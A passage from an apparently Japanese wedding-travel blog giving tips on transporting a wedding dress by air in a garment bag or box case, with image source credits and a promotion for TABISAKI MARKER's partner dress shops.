エコノミーかビジネスなのかにもよって対応が違うケースもあるので、事前に確認は必須ですが、出来る限り機内に持込みましょう!

BOXタイプもあります♪
スクリーンショット 2017-08-14 22.54.46
出典:www.ieiebridal.com

サイドがワンポイント?ガーメントバッグ
スクリーンショット 2017-08-14 23.08.28
出典:cindab.com

購入またはレンタルショップに聞いてみて

ドレスを購入または、レンタルしたショップで販売しているところも多いです。確認してみてくださいね。

スクリーンショット 2017-08-14 23.29.25
出典:http://tropicaltanning.info/

ちなみに、TABISAKI MARKERにてご案内可能な提携ドレスSHOPでは、TABISAKI MARKER購入特典としてガーメントバッグを無料でプレゼントしてます♪♪